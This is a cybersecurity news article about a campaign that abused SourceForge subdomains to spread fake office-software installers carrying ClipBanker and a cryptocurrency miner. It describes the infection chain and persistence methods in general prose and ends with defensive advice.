A recent malware distribution scheme has been uncovered on SourceForge, the popular software hosting and distribution platform.
Cybercriminals have leveraged SourceForge’s subdomain feature to deceive users with fake downloads of software applications, embedding malicious files into the infection chain.
This attack, primarily targeting Russian-speaking users, has raised alarms within the cybersecurity community for its level of complexity and persistence techniques.
.png
)
Exploitation of SourceForge Domains
The campaign starts with a seemingly legitimate software project called “officepackage” hosted on SourceForge.net.
The description and files of “officepackage” appear genuine, mimicking Microsoft Office add-ins from GitHub.
What makes this operation unique is the attackers’ exploitation of SourceForge’s feature that generates subdomains (e.g., officepackage.sourceforge[.]io) for hosted projects.
These subdomains are well-indexed by search engines, lending credibility to malicious pages created by the attackers.
On the officepackage.sourceforge[.]io domain, visitors are presented with an enticing list of office applications accompanied by “Download” buttons.
Hovering over these buttons reveals misleading URLs, such as loading.sourceforge[.]io/download.
Clicking these buttons initiates a multi-step malware infection chain, leading users to download a suspicious 7MB archive named “vinstaller.zip.”
The Infection Process
Inside “vinstaller.zip” lies a password-protected archive (“installer.zip”) and a text file disclosing the password.
Once extracted, the archive contains an oversized Windows Installer file named “installer.msi,” inflated with null bytes to falsely appear legitimate.
Executing this installer triggers various activities, including the creation of several files, the execution of embedded scripts, and communication with external servers.
A Visual Basic (VB) script embedded in the installer plays a crucial role, using PowerShell to download and execute a batch file named “confvk” from GitHub.
This batch file works as an intermediary, unpacking additional malware components, running scripts, and paving the way for advanced persistence mechanisms.
Notably, the payload includes two PowerShell scripts: one that extracts system information and sends it to a Telegram server, and another that downloads a subsequent batch file, “confvz,” orchestrating further infection steps.
The attackers have employed multiple persistence methods to secure access to compromised systems.
These include the creation of Windows services (e.g., NetworkConfiguration, PerformanceMonitor), registry modifications, and the use of the WMIC tool to establish event filters for recurrent malware execution.
The confvz batch file organizes malware components into subdirectories and executes AutoIt scripts contained within DLLs, facilitating the deployment of sophisticated malware types.
According to the Report, two notable payloads ClipBanker and a cryptocurrency mining module are injected into the system.
ClipBanker manipulates clipboard data to replace cryptocurrency wallet addresses, redirecting funds to attackers’ wallets.
Additional measures, such as leveraging debugging tools and exploiting OS installation scripts, further demonstrate the attackers’ ingenuity in ensuring their malware remains active.
Telemetry data indicates that 90% of the victims are located in Russia, reflecting a strong focus on Russian-speaking users.
Between January and March 2025, over 4,600 users encountered the scheme.
While the primary aim appears to be cryptocurrency theft, the attackers may also sell access to infected systems to other threat actors.
This campaign underscores the dangers of downloading software from unofficial sources. Users are advised to obtain software exclusively from trusted platforms and vendors.
SourceForge, while a reputable hosting platform, has unintentionally become a vector for malware distribution due to its subdomain creation feature.
Organizations must enhance their defenses against increasingly sophisticated threats like this.
Antivirus solutions, network filtering, and employee training on phishing and malware avoidance are critical measures to mitigate risks.
As attackers continue to refine their methods, vigilance and preventive cybersecurity practices are essential to safeguard both individuals and enterprises from such malicious campaigns.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
